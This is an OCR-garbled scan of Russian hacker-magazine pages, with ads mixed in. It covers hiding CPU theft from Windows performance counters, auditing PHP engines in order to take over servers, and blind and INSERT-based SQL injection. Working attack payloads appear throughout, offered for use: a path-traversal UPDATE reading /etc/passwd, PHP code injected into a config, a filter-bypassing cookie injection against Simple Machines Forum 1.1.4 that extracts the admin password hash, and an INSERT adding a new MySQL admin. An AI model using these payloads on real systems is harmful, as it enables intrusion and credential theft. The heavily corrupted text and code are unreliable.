следующими ключами командной строки: «сІ.ехе/Ох сНеаІег.с» (где/Ох 



КОПИЛИ ИЙ ПРЕДЛАГАЕТ ДЛЯ ВАС € .Ю} ІОІІІІ1Г 5СЛ ^ 



Р хостинг 




1 Ч\ хоегі им] : 


рг дй 






Пл*кы 


Пирам^гры 


■ 


И*»іі 


вчтим 


1 Гб, 2 ШЙ1І, 2 Му&СК. Гчііы 




ОгЖруб 


Ваііс 


ЭТМеайма.&І^вОІ.бы 




Ог 344 йб. 


Виыгмьэ- Р'го 


5Г5. 10 глнггж 10 МуЗ& бн* 


Ог 12? руб 



Синими планами зі^ыіи.и. :і]кі^гаиия ]ЧІ|пшкщ:г 

р ВИРТУАЛЬНЫЕ 

ВЫДЕЛЕННЫЕ СЕРВЕРЫ 



! 



Плани 
Зѣргі: 
51-ІГ>4*П 
Вимгмвх 
Вынпсіхі Нео 



Плрамстри } Цс-іл 

ІГй ЫКІГ, ПАМ ТйСѢ Ога*ір)-в 

БГ6, ІЗВМЬ ВД.Ѵ 406 Ь ірафик Ог «О ру$, 

«те •мм&члл 1 всбоіалф» ОгЮ*»«, 

ѵу г, 20С*ЛЬ чллі. ' ИЮІ: трлфж І> ЦК руб. 



Дглні.імиіг.імш чы ■ІрЁЛіаіай'Н 

панель іцпипкі і 5 Рпигм|$іт- ЭТО руб. чес. 

г Д.ІЫ ІЧІІНІ І иліі іидцщл.ддщцщлых- 
мч.н.іииныі. Сср-мріін иін іцуміі скидки; 
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при ОИЛЛ.Т-С и 0 меч а »/ и 1 кТА НІ 1 'іі 

МрИ ЙІПЛС И 1 ІЙЛ гіешікі 20%. 



РЕГИСТРАЦИЯ ДОМЕНОВ 



Іа ре I II СТ р Н ІІ.Н ІО дпмсноп 

хот , пеі, *Ьіг Т .огд 

ьеаі о Э4Л руОііці, мк.нл'іаіі НДС 

Рспктрируеч іочсны в 5У+ зонах: 
ш іпГй в и ас ад ат а: Ь& Ьіг.р! Ы сп 
».ик сот.вд йе Ігіп деп.іп т, іо ]р іэ 
тй те.ик тэ пи рі зс ве зН 1с ѵд ига 



Системный администратор 

Помощник сисадмина, 
техподдержка 

В ы6-пр ограми ст. 










— максимальная оптимизация) и запускаем полученный файл сбеаіег.ехе 
на выполнение. 

Поскольку функция ЗІеер(І) пока закомментирована, программа исполь- 
зует все доступное процессорное время. Поэтому загрузка процессора (на 
однопроцессорной машине без поддержки Нурег-ТЬгеасІіпд или много- 
ядерности) вплотную приближается к 100%, а полное время выполнения 
(по показаниям самой программы) на Р-ІІІ 733 МНі составляет? сек. Эти 
показания вполне соответствуют счетчику производительности, оце- 
нившему потребление процессорного времени в 6 сек. В данном случае 
счетчику производительности можно верить, поскольку он вычисляет из 
общего времени выполнениям время, которое программа была вынужде- 
на разделять с другими — в фоне играл ѴѴіпатр, пара файлов качалась из 
сети. 

Атеперь раскомментируем ЗІеерИ ), перекомпилируем программу и запус- 
тим ее по новой. Как нетрудно видеть, загрузка процессора существенно 
снизилась, достигнув в максимуме -80%, а полное время выполнения про- 
граммы увеличилось на одну секунду (8 сек.). Однако показания «Диспетче- 
ра Задач» радикально изменились — он показал всего 3 сек., что, очевидно, 
не соответствует действительности! Объем вычислений-то не изменился! 

И потому подлинноезначение потребления процессорного времени никак 
не могло упасть. А ведь упало. Причем, в два раза! 

ОК, уменьшаем значение переменной зІеаІсЗОООО до 20000 и вновь 
перекомпилируем программу. На этот раз загрузка процессора падает до 
-50% (ширина «холмика», соответственно увеличивается). Полное время 
выполнения (вследствие падения КПД) составляетуже 1 1 сек., но показа- 
ния счетчика производительности продолжаютуменьшаться и колеблются 
между 2 и 3 сек., что дает нам среднее значение в 2,5 сек. 

Атеперь смертельный номер! Уменьшаем зіеаі с 20000 до 1 0000, чтобы 
поток существенную частьсвоего времени проводил восне. И что же? 
Загрузка процессора упала настолько, что его «холмик» практически 
сравнялся с «шумом» фоновых выплесков. Полное время выполнения 
программы увеличилось до 13 сек. (что вдвое больше первоначального 
результата с закомментированной функцией Зіеер), но счетчик произво- 
дительности показываетО сек. потребления процессорного времени (или 
1 сек. — в худшем случае). 



На двухпроцессорных машинахукрасть машинное время ещелегче (то 
же самое относится к Нурег-ТЬгеасІіпд и многоядерным ЦП), поскольку 
наш вычислительный поток в каждый момент выполняется на одном 
процессоре (хотя может мигрировать с процессора на процессор в про- 
цессе своей жизнедеятельности — это зависит оттого, какой процессор 
быстрее освободится). Подсчет машинного времени обычно усредняется 
для всех процессоров. Даже при выводе раздельных графиков загрузки 
(по одному на каждый ЦП), за счеттого, что наш поток периодически 
перебрасывается с одного процессора на другой, значения счетчиков 
производительности усредняются, в результате чего происходит их 
«сглаживание». 

Естественно, для эффективной кражи процессорного времени необ- 
ходимо знать тактовую частоту целевого процессора (процессоров), 
определяющую объем вычислений, которые программа проводит, 
прежде чем отдать остаток кванта другому потоку. Чем выше тактовая 
частота — тем выше значение переменной віеаі, и, соответственно, 
наоборот. ~а~ 



| |« Честна я» загрузка ЦП вычислительной задачей, выполняемой програм-| 
|мой сЬеаіег.ехеД 




и; 4 



ід Мм ІЯ Ірм ннф 




■ г- 

ЬЯй-ОцП -і, ?. МУЛ Нал ЬѴіИНМ. .1 . Ф 
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СОБЫТИЕ, КОТОРОЕ НЕЛЬЗЯ ПРОПУСТИТЬ! 




МЕЖДУНАРОДНАЯ ВЫСТАВКА 

10-13 апреля 

Крокус Экспо 




* ЯНнгву, НО ОѴО плееру 

* Ипдавдншв и ЖК пеняли, 

* І 1 І-Р 1 етгеде*гущ 
Ш&ШШНЙ ЙКФППИЗф 

+ м^*а№ид»ій датами ределвчонй 

* Нфозд#» пдесттокн 

* Г№рШТ№НЯЛ ЗЛ№ЩК**№& 

ноаигшиі 

- Обздзддо&шззд для пдоѵш 

ЦИфрОЭДГоТЗ 

- Снспмы Итога Й#ма 

- М46&ЛІ* И ЯрЛОНЫКЛ 

•Контент 






** Ь| новых техно пѲ 



Г ѵ >^ 



О-кшготторс 



ГПвныа мвди-лертішоы: 



<1р* івдднжю: 



К РАТЭК ъѵжж.ГісІівІіаѵѵ.ііі 





ПУТЬ БАГОИСКАТЕЛЯ 



ОБЩИЕ ПРИЕМЫ АНАЛИЗА РНР-ДВИЖКОВ 



Бытует мнение, что найти серьезный баг в популярном продуктенельзя 
Действительно, сделатьэто сложно. Современные кодеры пшщщцюдукты , 
явно с учетом сущес твова ния нас с вами. Однако пусть они хот ь обтестщ 

■ \ | ~ у 

тся — проследить взаимозависимости ^выз овы спскхЯ^^ 

[лишь гений, которых, как известно, в мире очень мало. Зато хакеров, кото-| 
рых хлебом не корми, д ан ч то-нибудь взломать, пока хватает. 



I 




^ СОЗДАЕМ ПЛАЦДАРМ 

Перво-наперво поднимем локальный веб-сервер на своем РС. Согла- 
сись, что палить найденные баги в логах на официальном сайте просто не 
профессионально. Хотя дело не только в «засвечивании»уязвимостей. 
Настройки чужого сервера могутбыть неблагоприятны, и мы просто не за- 
метим баг в движке. Поэтому скажу несколько слов о настройке локального 
веб-сервера с приоритетом на максимальное отображение всех ошибок. 
Для продуктивной работы обзаведемся связкой АрасЬе+РНР+Му50І_. 
Уделим внимание некоторым переменным в рЬр.іпі. 

РНР.ІШ 

гедізЬег_д1оЬа1з=0Ы ; глобализация переменных — потенци- 
альная брешь в безопасности 



шадіс_диобез=0І р Р ; отключаем магические кавычки для СЕТ/ 
РОЗТ/СООКІЕ — благоприятствует 

тадіс_диобез_гипбіте ::: 0РР ; благоприятствует ЗОЬ-ігщ 
тадіс_диобез_зуЪазе=0РР ; благоприятствует ЗОЬ-іпз 
шузді . бгасе_тос1е=ОЫ ; включает показ ошибок МуЗОЬ 
а11ош_иг1_бореп=ОЫ ; разрешает удаленное открытие файлов 
файловыми функциями 

а11ом_иг1_іпс1ибе=(Ж ; разрешает удаленно инклудить 
файлы (РНР5 . 2 ) 

еггог_герогбіпд=Е_АЬЬ ; показ всех ошибок 
еггог_1од= /ѵаг/1од/1іббрб/р1ір_еггог ; логирование оши- 
бок 



1од_еггогз :::: 0Ы ; логирование ошибок 
бізаЫе_бипсбіопз= ; никаких ограничений 
забе_тосіе=0РР ; никаких ограничений 
ореп_ЪазесІіг= ; никаких ограничений 
зді . заБе_тос1е=0РР ; благоприятствует ЗОЬ-іго 



И, конечно, грамотно настроим конфигАпача: 

Бігесбогуіпбех [пусто] ; нет стартовой страницы 
Орбіопз Іпбехез; листинг директорий 



(это позволит сканеру свободно проиндексировать и про- 
анализировать все скрытые скрипты) 

Все, теперь наш плацдарм готов для анализа бажных движков. 

г ПОИСКОВИКИ 

Аудит цели почти каждый привык начинать с нехитрых запросов в поис- 
ковых системах. Но едва дело доходит до аудита кода, зачастую про них 
забывают. Вот это зря! Ведь Гугл предоставил мощное средство поиска в 
исходниках [ ѵѵ\ллл/.аооа[е.сот/собе5еагсб?б[=ги ). Прими это ксведению 
— пригодится. 

г СРАВНЕНИЕ ВЕРСИЙ 

Ничто не мешает обратить обновление движка против него самого. То есть 
тупо взять две соседних версии проекта и сравнением изменений найти 
в нем баг. Часто разработчик прикладывает НІ5Т0РУ.М: ксвоему детищу, 
дабы мы могли на глазок оценить прогресс развития проекта. Но это палка 
о двух концах. Ведь помимо всяких баг-фиксов в этом файле может быть 
и скудное описание найденных закрытыхуязвимостей. Иными словами, 
можно использовать НІ5Т0ВУ.М для атак на старые версии, ведь за обнов- 
лением движка следит далеко не каждый администратор проекта. 

На заметку еще один момент. То, что пофиксено — не обязательно пофиксе- 
но повсеместно. Есть множество примеров из публичных багов (например, 
подстановка %2527 в рбрВВ] и личного опыта, когда разработчиком патчит- 
ся один файл, а по соседству лежат еще 10 дырявыхскриптов саналогич- 
ным багом. Чем не хакерский рай? 

Если цель — взломать определенный движок, то следует посетить офици- 
альный сайт проекта. В 99% случаяхтам есть зесигііу-трек либо Р55-лента, 
где можно найти что-нибудь интересное — будь то информация о новом 
модуле или мегадобавление, без которого пользователь, по уверениям 
разработчика, не сможет прожить ни дня. 

Бывает, что меняется состав команды кодеров, и в первую очередь страдает 
безопасность, поскольку сроки выполнения проекта всегда важнее его 
качества. 

И еще. Нужно обязательно скачать последнюю и предпоследнюю версию 
движка. В общем-то, я уже это предлагал, но здесь речь идет не об 
НІЗТОРШхГ Воспользуйся автоматизированной утилитой для побайтного 
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взлом 




сравнения файлов (например, АѴС, ѴѴіпМегде, АиІюѴег, Ваіааг, 
ВеуопсІ Сотраге — ищи их на нашем 0Ѵ0) и попытайся понять, 
почему программист дописал или убрал выделяющийся код. 
Отмечу, что замечательность архива, в который запакован 
движок, втом, что помимо самихфайлов в нем сохраняются их 
атрибуты, втом числе и даты изменения. Распаковав архив, 
находим банальным виндовым поиском свеженькие файлы и 
скрупулезно ищем отличия от предыдущей версии двига. 

г ПОИСК ПО РЕГУЛЯРНОМУ ВЫРАЖЕНИЮ 

Итак, наступает самая важная хакерская фаза — ручная рас- 
копка исходников. Поверь мне, так и только так мы получим то, 
что ищем. Ведь ни один сканер не сделаетза тебя эту грязную 
и скрупулезную работу! 

Стечением времени опыт будетприносить свое... Дасттебе воз- 
можность просматривать код одним глазом (или даже по диаго- 
нали), сходу выявляя дефекты приложения. Но на первых порах 
рекомендую пользоваться какой-либо продвинутой поисковой 
софтиной. Уж чего-чего, а их сейчас предостаточно. Желатель- 
но, чтобы тулза поддерживала поиск в архивах, поскольку при 
массовом скане набора движков на конкретный баг, согласись, 
что распаковывать каждый файл весьма накладно. Чтобы не 
быть голословным, я выложил подборку зарекомендованных 
программ на наш йѴй (БеагсЫпІогт, РоѵѵегбРЕР, НапсІуРіпсІ 
и ТехіЗирегВеагсЫ. Установив себе любую из них, зададим 
ключевое слово или фразу и обратимся когромномулогу. Баг, в 
отличие от девушки, ждеттебя, постоянен и предсказуем :). 
Поиск может носить взаимообратную тактику, то есть либо мы 
сканируем один двигна все баги, либо набор движков на один 
баг. В первом случае мы работаем на качество (к чему я и сове- 
тую стремиться), а во втором, несомненно, на количество. 
Часто случается так, что хакер находитуязвимость в функции 
РНР, регулярном выражении или вдругой глобальной вещи. И 
данный багхарактерен для многих продуктов. Помни, главная 
задача заключается втом, чтобы не проворонить аналогичную 
дырку вдругом популярном двиге и заюзатьее, пока админ 
или коллега хакер не добрался до багтрака. 

Кстати! Внимательно следи за багтраками, смотри принцип 
работы чужих эксплоитов — все это тебе понадобится в даль- 
нейшем, если ты действительно намерен добиться успеха, а не 
быть посредственным псевдохакером, каких сейчастолпы. 

г ЦЕЛИ ПОИСКА 

Итак, давай выясним, чего же мы хотим? А хотим мы 
порулить сервером. Исходя из этого, сформулируем цели и 
задачи. 



Вторжение на сервер условно можно разделить на сле- 
дующие этапы: 

1. Повышение привилегий. В общем случае этап заключается 
в повышении прав с гостя до администратора/модератора/ре- 
дактора и т.д. Как правило, это осуществляется при помощи 
5СН_-инъекции или Х55. О данных атаках не раз писали на 
страницах нашего журнала, поэтому заострять внимание на 
этом не буду. На практике, доверия к администратору всегда 
больше, потому код «админок» или «модерок» на порядокды- 
рявее прочих. И частенько, имея учетную запись пользователя 
или модератора, можнотак или иначе получить права админа. 
Согласен, что этот шаг необязателен, поскольку наличие дру- 
гихуязвимостей позволяет пропустить его, например: 

2. Выполнение произвольного кода с привилегиями веб-серве- 
ра. Вотто, ради чего мы с вами мучаемся (хотя, надо сказать, что 
далеко не каждый хакер удовлетворяется веб-шелом). Отдельно 
коснусь инклудов. Незабываем, чтодляудаленныхуязвимостей 
подобного рода помимо нулл-байта существует знак вопроса, а 
для локальных пригодны логи апача и файлы сессий. 

Заострим наше внимание на исполнении произвольного кода 

в админке. Желанная надпись «Загрузить шелл как картинку» 
встречается все реже, а полазать по серваку по-прежнему охота. 
Существует масса способов исполнить произвольный код, там, 
где нельзя, но очень хочется. Часть из них я описал в статье «Ро- 
ковые ошибки РНР», а вот, на десерт, еще парочка способов. 

г ТРЮК ПЕРВЫЙ 

Данным, получаемым из БД, доверяют99% приложений. При 
заносе в БД данные оченьтщательно проверяются, но не на- 
оборот. Самый смак втом, что даже если на серваке включен 
тадіс_циоІе5 и найденный инклуд невозможно проэксплуати- 
ровать.то Му50І_дает отличный козырь, посколькуон вполне 
переваривает МІЛ_І_-байт. Ну а в базе может храниться путь к 
двигу, теме, шаблону или языку, который входит в часть пути 
инклуда! Модуль восстановления БД сейчас есть практически 
везде. Воттак, нехитрым образом, можно посмотреть базу 
аккаунтов на сервере. 

ІІРБАТЕ стз_сопбід ЗЕТ 1апд=сопса1: ( ' гиз/ 

. . / . . /ебс/разз ѵкі ' , 0x00 ) ; 

^ ТРЮК ВТОРОЙ 

Настройки доступа к БД зачастую хранятся в файле, который 
может редактироваться из админки. В случае недостаточной 
фильтрации мы можем вписать в конфиг произвольный РНР- 
код. Например, рЬріпЫ). 




>> 




ЬКр://5есигіІѵ.ппоѵ. 

ги/зоигсе/РНР.ЫтІ 

— ошибки в РНР 

Нйр://с1отаіп5СІЬ.сот 

— база для поиска 
соседей на вирту- 
альном хостинге. 

ГіКр://тасІпеі 

патеЛооІз/ЬидзеагсЬ/ 

— уникальный ори- 
гинальный он-лайн 
гугл-сканер. 

ЬЦрУАооІз.ѵѵеЬтазІегз. 

зк/зйетар-сгеаіог.рЬр 

— инструмент созда- 
ния карты сайта, на- 
ходитто, о чем давно 
забыл админ :). 




На нашем диске ты 
найдешь большую 
подборку различных 
сканеров исходных 
кодов. 

Но помни, что пока 
лучший известный 
сканер — это чело- 
веческий мозг. Собе- 
ри под него базу! 
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Было: 



$с!Ъ_]іозЕ = ' ІосаІЕюзЕ ' ; 




Стало 

$с!Ъ_]іозЕ = ' ІосаІЕюзЕ ' /рііріп^о ( ) ; \ \ ' ; 

3. Дальнейшее повышение прав ака «полный рут» всеми правдами и не- 
правдами. Рассмотрение сей проблемы, ксожалению, выходитза пределы 
темы статьи. 



что только существует, причем иногда и по два-три раза. Встроена це- 
ленаправленная защита от а н сета, глобальса, 50І_-атак, организовано 
грамотное логи рование ошибок. В общем, все, вроде бы, как подобает. 
Но русские хакеры не сдаются :). Пробежавшись по сорцам, я заметил 
интересную вещь: глобальный массив_НЕ01ІЕ5Т насильно переписыва- 
ют через _6ЕТ и_Р05Т. Даже не представляю, зачем это потребовалось. 
Далее, кодеры забывают обнулить $1;оріс в случае отсутствия его в новом 
запросе. Смотри сам: 

/5оигсез/0иегу51гіпд.рИр 

$_КЕ<2иЕ8Т = $_РОЗТ + $_СЕТ; 





0 СЛАДКОЕ ПЕЧЕНЬЕ 

Предположим, с помощью найденной баги удалось перехватить хэш 
пароля администратора. Но вот незадача — вход в админку реализуется 
только по паролю (не в виде хэша). Неужели опять брутить? Не спешим 
запускать любимый брутфорс, а внимательно покопаемся в сорцах с 
целью четкого выяснения механизма авторизации. В большинстве 
случаев вовсе не обязательно колоть хэш — достаточно сгенерировать 
валидый кукиз на его основе и админка будет для нас открыта. 

Кстати, ещедалеко не все движки используютсессии, времяжизни сес- 
сии/кукиза, или хитрый алгоритм с солью, что препятствует использованию 
добытого хэша в хакерских целях. 

0 АВТОМАТИЗАЦИЯ 

Настало время написать эксплоит на успешно найденный баг. Не волнуйся, 
тут нет ничего сверхсложного. Новичку на первое время я бы рекомендовал 
разобраться в чужом эксплойте и просто апдейтить его код под свои нужды. 
Набравшись опыта, напишешь свой собственный. Выбор языка — дело 
вкуса и склонностей. В качестве базового ты можешь воспользоваться тем, 
который мы сейчас напишем. 

При написании эксплойта желательно использовать алгоритм атаки, 
наиболее незаметной сточки зрения логов (Р05Т, С00К1Е, но никакие 6ЕТ! 
Не стоитпалить найденный баг), атакже учитывать пограничные ситуации, 
когда в работе эксплойта что-либо может пойти не так. Например, отключен 
выводошибок, на который опирается эксплойт, или версия/тип базы 
данных не подходит. Здесь следует грамотно предусмотреть режим отладки 
ит.п. Не ленись — сделай это для себя, ведь в дальнейшем самомуже будет 
проще разобраться. 



г 5МР <= 1.1.4 5СИ-І№ЕСТІ0Ы 

Настало время применить наши знания на практике. В качестве цели был 
избран подопытный движок Зітріе МасЫпез Рогит (5МР) последней 
версии 1.1.4. 

Позволю себе небольшое лирическое отступление: летом в 5МР нашли 
50Е-іп]есбоп и в связи с этим был обнародован публичный эксплоит. 
Уместным будет сказать о том, что после подобных «сюрпризов» разра- 
ботчики хватаются за голову и начинают старательно патчить своетво- 
рение. Как следствие, поиск новых уязвимостей становится на порядок 
сложнее. Сразу после выхода эксплоита кодеры реально озаботились 
секурностью своего продукта и залатали дырки по полной программе. 
Гайки закрутили тщательно — слешируется и «чарится» абсолютно все, 



ІД ( іззеЕ ( $_КЕ<21ІЕ5Т [ ' Еоріс ' ] ) ) 

{ 

$Еоріс = (іпЕ) $_КЕ01ІЕЗТ [ ' Еоріс ' ] ; 

} 

Таким образом, при гедіз1:ег_дІоЬаІ5=0М мы можем определить $Іоріс через 
СООКІЕ и обойти фильтрацию. 

Дело в том, что в дальнейшем скрипты всецело доверяют переменной 
$Іоріс, подставляя её в кучу кверей даже без кавычек! 

/5оигсе5/І_оас1.рНр 

// СЪеск Тог тосіегаЕогз апсі зее іТ Ыіеу каѵе ассезз До 
ЕЪе Ъоагсі. 

ТипсЕіоп ІоасІВоагсІ ( ) 

{ 



іТ (етрЕу ( $Еешр) ) 

{ 

$гедиезЕ = сіЬ_диегу ( " 

ЗЕКЕСТ с.ІБ_САТ, Ъ.пате АЗ Ьпаше, Ъ.сІезсгірЕіоп, 
Ъ.пшпТорісз, Ъ .шешЪегСгоирз , Ь.ІБ_РАЕЕЫТ / с. паше АЗ 
спаше, ІЕШЬЬ (теш. ІВ_МЕМВЕК, 0) АЗ ІБ.МОБЕКАТОК, шеш. 
геаІЫате" . ( ! етрЕу ( $Еоріс) ? ", Ъ.ІБ_ВОАШЗ" : 1 ’) 

. ", Ь. сЪіІсІЪеѵеІ , Ь.ІБ_ТНЕМЕ, Ъ . оѵеггісіе_1:]іете , 
Ъ.регтіззіоп_тосІе , Ь. соипСРозЕз 

ЕКОМ ( { $сіЬ_ргеТіх}Ьоаг(Тз АЗ Ь" . ( ! етрру ( $Роріс) ? ", 

{ $(5Ь_ргеТіх}Рорісз АЗ Е" : 1 ’ ) . ") 

ЬЕЕТ ЛЭШ { $сіЪ_ргеТіх}саЕедогіез АЗ с ОЫ (с.ІБ_САТ = 

Ь. ІБ_САТ) 

ЬЕЕТ ЛЭШ { $(іЪ_ргеТіх}шо(5егаЕогз АЗ тойз (Ж (тосІз.ІЦ_ 
ВОАЕ.Б = ". (етрЕу ($Еоріс) ? $Ьоагд : ’ Е .ПХЦВОАКО') . ") 
ЬЕЕТ ЛЭШ { $(ТЬ_ргеТіх}тегпЬегз АЗ шеш ОЫ (шеш. ІБ_МЕМВЕВ = 
тосіз . ІБ_МЕМВЕК) 

ШЕКЕ Ь . ІБ_ВОАКВ = " . ( ешрЕу ( $Еоріс ) ? $Ъоагд : "Е.ІБ_ 

В О АКБ АЫБ Е.ІБ_ТОРІС = $Еоріс") , ЕІЬЕ , ЬШЕ ) ; 

Перебрав несколько сайтов из гугла, я нашел подтверждение своей догад- 
ке в виде победного «..Муздіеггог..» :). 

Но если бы все былотак просто! Получив вожделенный еррор, сталкива- 
ешься со следующей проблемой — защитой против скулей. 
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/Зоигсез/ЗиЬз.рИр 

Еипсііоп сІЪ_диегу ( $сІЪ_зЬгіпд, $іі1е, $1іпе) 

{ 



іі (ешрку ( $шосІЗеЬ1:іпдз [ ' ЬізаЪІеОиегуСЬеск' ] ) ) 

{ 



$с1еап . = зиЬзіг ( $сІЬ_з1:гіпд, $о1с!_роз) ; 

$с1еап = ЬгітІзЬгЬоІсжег (ргед_гер1асе (аггау ( '~\ 
3+~3', ' ~/\*І 40001 30Ь_КЮ_САСНЕ \*/~' , ' ~/ \ *! 40000 ЬЗЕ 
ІЫБЕХ \ ( [А-2а-г\_]+?\) \*/~' ), аггау ( ' ' '), 

$с1еап) ) ) ; 



>> 







// Ме скт'Ь изе ШЮЫ іп ЗМЕ, аЬ ІеазЬ зо іаг. ВиЬ 
ІЬ 1 з изеіиі іог іпіесЬіопз. 

іі (збгроз ( $016311, 'ипіоп') ! == іаізе && ргед_ 
таісЬ (' ~ ( л | [ л а- 2 ] ) ипіоп ($ | [ л [а- 2 ] ) ~з ' , $с1еап) !=0) 
$іаі1 = Ьгие; 

// СоттепЬз? Не скт'Ь изе сотшепЪз іп оиг диегіез, 
ѵ?е Іеаѵе ' ет оиЬзісІе! 

еізеіі (зкгроз ( $с1еап ; '/*') >2 II збгроз ( $с1еап, 

' — ' ) !==:Еа1зе II зкгроз ( $с1еап, !==іа1зе) 

$іаі1 = Ьгие; 

// Тгуіпд Ьо сЬапде раззѵгогсіз, зіоѵ/ из йоші, ог 
зотеЬЬіпд? 

еізеіі (зкгроз ( $с1еап, ' зіеер') ! == іаізе && ргед_ 
шаЬсЬ ( ' ~ ( л | [ л а- 2 ] ) зіеер ( $ I [ л [а-г] ) ~з ' , $с1еап) != 0) 
$іаі1 = Ьгие; 

еізеіі (зкгроз ( $с1еап, ' ЬепсЬшагк') !== іаізе 
&& ргед_таксЬ ( 1 ~ ( л I [ л а- 2 ] ) ЬепсЬшагк ( $ | [ л [а- г] ) ~з ' , 
$с1еап) ! = 0 ) 

$іаі1 = Ьгие; 

// ЗиЪ зеіескз? Не скш'Ь изе ЬЬозе еіЬЬег. 

еізеіі (ргед_таісЬ ( ' ~\ ( [ А ) ] *?зе1еск~з ' , $с1еап) 

!= 0) 

$іаі1 = Ьгие; 



как бы со следующей строчки, воспринимается интерпретатором 
вполне корректно! 

СООКІЕ: Ьоріс= (#) %0Азе1есЬ 1) 

Рабочий запрос полностью: 

/ іпсіех . рЬр 

СООКІЕ : Ьоріс=іі (азсіі (зиЪзбгіпд ( ( #) %0Азе1есб 
сопсаЬ (ісІ_тетЪег , 0хЗА,раззмсі) ігот зті_тетЬегз ѵгііеге 
із_асЬіѵаЬесІ=1 АМБ ісІ_тетЪег=1 ІітіЬ 1) , 1 , 1) ) >1 , 1 , (#) %0 
Азеіесб пиіі Ігош зші_шешЬегз) ) ; 

Еще некоторое время уходит на подгонку под багу моего шаблонного 
эксплоита, который ты можешь найти на видео-ролике к этой статье. Ре- 
зультатом работы эксплойта является хеш админского пароля в алгоритме 
збаі (5Шо1о\л/ег($и5егпате).$раз5\л/огс1). Последняя версия РаззѵѵогсІРго 
имеетспециальный модуль для восстановления пароля оттакого хеша. 

Ш НАПУТСТВИЕ 

Как видишь, даже весьма серьезные и защищаемые продукты не застра- 
хованы от всех опасностей. Безграмотность кодеров и незнание тонкостей 
среды, в которой они программируют — настоящий рог изобилия багов. 
Помни это и копай дальше! т 



Как видно из кода, мы не можем использовать ‘ипіоп’, ‘зеІесТ.’зІеер’, 
Ъепсбтагк’ и У*’. Если применять технологию «БиЬциегу тоге 1 гоѵѵ»,то 
можно отказаться от ипіоп, зіеер и ЬепсЬтагк. Но зеіесі и комментарий все 
равно остаются необходимы... 

Казалось бы, безвыходная ситуация. Поскольку зеіесі будет пропу- 
щен фильтром, если перед селектом закроется скобка, то мы можем 
закрыть скобку в комментарии. Но ведь и сам комментарий вида /**/ 
фильтруется! Немного подумав, я вспомнил малоизвестный коммен- 
тарий для Му50І_ — ‘#\ Однако ‘#’ комментирует все от решетки и до 
конца строки, пожирая при этом всю полезную нагрузку. Тогда вве- 
дем %0А (перевод строки) и полезное выражение, будучи начатым 



Техі ѴѴогкЬепсЬ 
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В этой статье показан новый и универсальный спосб(эвыполнения Ыіпсі 



ЭДЬ-инъекции без использования ЪепсйтагІ^а* 

I _ I 



Іаиденная альтернатива 



позволяет получать требуемую информацию из базы данных в «неюзабель- 



. 

ных» ЭДЬ-инъекциях, таких как 

ѣ 



Ьрэате, керТ, 



АСЕиШ 



I 



ж п 



Также я подробно опишу аспекты практического использования бенчмар- 
ка при написании эксплойтов. И даю свой последний 1у^ что это сработает 



1 



практически на всех СУБД. Проверим? 

■ I Г" I 

Ш СОМЕ (Ж 

Программисты умнеют, багов в селект-запросах становится все меньше, 
а проблема ЗОБ-инъекций в ІМ5ЕКТ,ІІР0АТЕ,НЕРІ_АСЕ,0ЕІ_ЕТЕ и прочих 
становится все более и более актуальной. В последнее время я часто слышу 
вопросы: «..подскажи, что мне делать, если сервер выдает— 'тузціеггог 
ІЫ5ЕРТ ІЫТО 1аЫе_патеѴАШЕ5(...'». 

Видя такую ошибку, новичок в хаке закроет браузер, а любитель запостит 
сотый вопрос на форумах. В ответ, как правило, тишина либо советы, 
которыми он не в силах воспользоваться, поскольку раскрутка ЫіпсІ-50Е в 
виду специфики заставляет заморочиться даже специалистов (не говоря 
уж о новичках). К тому же дикое количество запросов к БД и объем трафика, 
характерный для слепых инъекций, требуют применения автоматизации, то 
есть умения писать эксплоит, что тоже ставит многих в тупик. 

Способы проведения ЫіпсІ-атакдавно известны и подробно расписаны 1 сП. 
ѵѵОІі (еще 14 ноября 2004). Не читал статьютолько ленивый: 
ѵѵ\л/ѵѵ.5есигіМаЬ.ги/сопІе5і/21 2099. рЬр . Мое исследование можешь 
считать ее продолжением. 



г шгы 



Когда мне попадается подобная скуль, я более чем доволен. Опасность и 
пользу она дает ощутимо большую, чем банальный селект-инъект. 

Что можно из этого выжать? Немного мозга, и мы получим от БД все, что 
захотим. Это не селект — мы можем не только получать, но и изменять 
данные, к примеру, добавить нового админа. Согласись, что это гораздо 
приятнее, чем брутить парольуже существующего. 

Сейчас я рассмотрю модификацию данных лишь как бонус, а основное 
внимание сосредоточу на извлечении необходимой информации. Для 
начала вспомним особенности известных способов атак 50 Б- і п] , при- 
менимых к перечисленным выше операторам. 

В Ш5ЕКТ И ДРУГИЕ 

Известные атаки на іпзегі/ирсіаіе/еіс. 

І.БСБ-іпі в именитаблицы. Здесь возможно все: 

1№ЕКТ ШТО [3<2Ь] ѴАШЕ5 ( 

'апЕісЪаЕ' , 'ШѴГ , 
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|0тветдля МЗЗОБ — 'ЗиЬдиегу геіигпесі тогеШап 1 ѵаіие’1 



’тоге_1_гоѵѵ’ на реальном примере для МуЗОБ 



'РНР' , 'ЗОБ' , 'ХЗЗ' ) ; 

Например, добавление нового пользователя: 

ІЫЗЕРТ ІЫТО [ тузді.изег (изег, 

БозЕ, раззѵгагсі) ѴАШЕЗ ( ' пеиасітіп ' , 

РАЗЗЖЖБ ( ' раззмсі ')), 'а', ' Ь ' , ' с ' ) / * ] ѴАШЕЗ 
( ' апбісБаб ' , ' ИШ ' , ' РНР ’ , ' ЗОБ ' , ' ХЗЗ ' ) ; 

2. К сожалению, подобные ЗОБ-іп] в 99% случаев присутствуют 
в имени столбца, что не позволяет изменить модифицируемую 
таблицу. 

ІЫЗЕРТ ІЫТО иЫе ѴАШЕЗ ( ’апЬісЬаІ: ' , 'Ш' , ' РН 
Р 1 , ’ [ЗОБ] ' , 'ХЗЗ' ) ; 

Аразтак.то кроме порчи/засорения ОоЗ’а БДмы модифика- 
цией данных ничего не добьемся. 

ІЫЗЕРТ ІЫТО ІаЫе ѴАШЕЗ ( 'апбісБаб ' , 'Ш' , ’ РН 
Р 1 , ' [ безб ' , ' сіето ' ) / * ] ' , ' ХЗЗ ' ) ; 

3. Но выразим респект Гемоглабину, который нетакдавно опи- 
сал нашумевший ОЫ ОБІРБІСАТЕ КЕУ-баг. В дебрях мускуль- 
ного мана он откопал замечательный способ, позволяющий 
творить полноценное безобразие из имени столбца. 
Использование конструкции «ОЫ ОИ РБІСАТЕ КЕУ БІРйАТЕ» 
позволяетобновить значения нужных нам полей даже в дру- 
гой таблице изтекущего запроса: 

ІЫЗЕРТ ІЫТО 'изегз' ( 'паше' , ’раззѵгогсі' 

, 'ешаіі' , ' ірасісігезз ' ) ѴАШЕЗ ( 

